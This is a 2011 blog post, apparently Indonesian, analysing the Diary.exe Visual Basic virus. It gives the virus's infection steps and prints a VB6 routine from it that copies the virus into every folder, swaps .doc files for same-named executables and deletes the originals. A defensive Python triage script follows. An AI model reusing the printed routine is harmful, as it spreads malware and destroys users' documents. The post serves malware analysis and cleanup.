
Sunday, 25 December 2011

How the Diary.exe Virus Works

 
Diary.Exe is a virus (said by Vaksin.com to be quite dangerous) made by a local Vxer (virus writer). It was written in Visual Basic 6.0. Diary.Exe works using (more or less) the following algorithm:

START EXECUTION

1. Create the file Diary Seorang Newbie.txt in the folder %userprofile%\Application Data.
2. Check whether the folder %ProgramFiles%\Common Files\System exists.
   - Exists: create the file Explorer.Exe in the folder %ProgramFiles%\Common Files\System.
   - Does not exist: create the file in the folder %systemroot%\System32.
3. Infect registry keys: hidden files, DisableRegistryTools, etc.
4. Check whether the folder %Program Files%\InstallShield Installation Information exists.
   - Exists: continue.
   - Does not exist: create the folder %Program Files%\InstallShield Installation Information.
5. Create the file Rsvdb.Exe in %Program Files%\InstallShield Installation Information.
6. Create the file RegsvcChk.Exe in the folder %SystemRoot%.
7. Create the file Spoolsw.Exe in the folder %userprofile%\Application Data.
8. Execute Regsvcchk.Exe.
9. Execute Spoolsw.Exe.
10. Detect and delete all variants of the Kangen virus on the computer.
11. Detect and infect all MS-Word files (*.Doc) on the computer.

END EXECUTION
  
Here is the source code showing how the virus deletes .doc files:

Private Sub cek(path As String)
    On Error Resume Next
    ' Normalise the folder path so it ends with a backslash
    If Right(path, 1) <> "\" Then
        path = path + "\"
    End If
    Set fol = fso.getfolder(path)
    Set fil = fol.Files
    Set subfol = fol.subfolders
    ' Drop Diary.exe into the folder unless it is already there
    If fso.fileexists(path + "Diary.exe") = True Then
        GoTo a
    Else
        Call copi("Diary.exe", path)
    End If
a:  For Each fil2 In fil
        If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC" Then
            ' Create <document name>.exe, then delete the original document
            desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
            Call copi(desk1 + ".exe", path)
            Kill fil2.path
        End If
    Next
    ' Recurse into every subfolder
    For Each subfols In subfol
        cek (subfols.path)
    Next
End Sub

The virus also minimizes windows that carry the strings "Registry Editor", "Application Data", "WINDOWS", "WINNT", "Program Files", "Command Prompt", "DOS", "Task", "Process", "System", "Hijack", and "Kill". The source code for that exists too, but it is long, bro, hehehe.
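
A triage sketch for the behaviour described above, added here as an example and not code from the original post or from the virus: it checks for the dropped files listed in the execution flow and, for each folder that contains Diary.exe, lists the .doc names whose .exe stand-ins are present. The function names and the assumption that copi() writes a byte-identical copy of the virus are assumptions of this example.

```python
import hashlib
import os
from pathlib import Path

# Files the execution flow above drops: (environment variable, path parts).
DROPPED = [
    ("USERPROFILE", ("Application Data", "Diary Seorang Newbie.txt")),
    ("ProgramFiles", ("Common Files", "System", "Explorer.Exe")),
    ("ProgramFiles", ("InstallShield Installation Information", "Rsvdb.Exe")),
    ("SystemRoot", ("RegsvcChk.Exe",)),
    ("USERPROFILE", ("Application Data", "Spoolsw.Exe")),
]

def dropped_files_present(env=os.environ):
    """Return the dropped files from the flow that exist under env's folders."""
    paths = (Path(env[var], *parts) for var, parts in DROPPED if env.get(var))
    return [str(p) for p in paths if p.is_file()]

def _sha256(path):
    try:
        return hashlib.sha256(path.read_bytes()).hexdigest()
    except OSError:  # locked or unreadable file: cannot be compared
        return None

def replaced_documents(root):
    """Map each folder holding Diary.exe to the .doc names replaced there.

    Assumption: copi() writes a byte-identical copy of the virus, so a sibling
    .exe whose hash equals Diary.exe's stands in for a deleted <name>.doc.
    """
    report = {}
    for folder, _dirs, files in os.walk(root):
        marker = next((f for f in files if f.lower() == "diary.exe"), None)
        ref = _sha256(Path(folder, marker)) if marker else None
        if ref is None:
            continue
        lost = sorted(
            Path(f).stem + ".doc"
            for f in files
            if f != marker and f.lower().endswith(".exe")
            and _sha256(Path(folder, f)) == ref
        )
        report[folder] = lost
    return report

if __name__ == "__main__":
    print("Dropped files found:", dropped_files_present())
    for folder, docs in replaced_documents(os.getcwd()).items():
        print(folder, "->", docs or "Diary.exe only")
```

The resulting list of .doc names is the set of documents to restore from backup for each affected folder.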

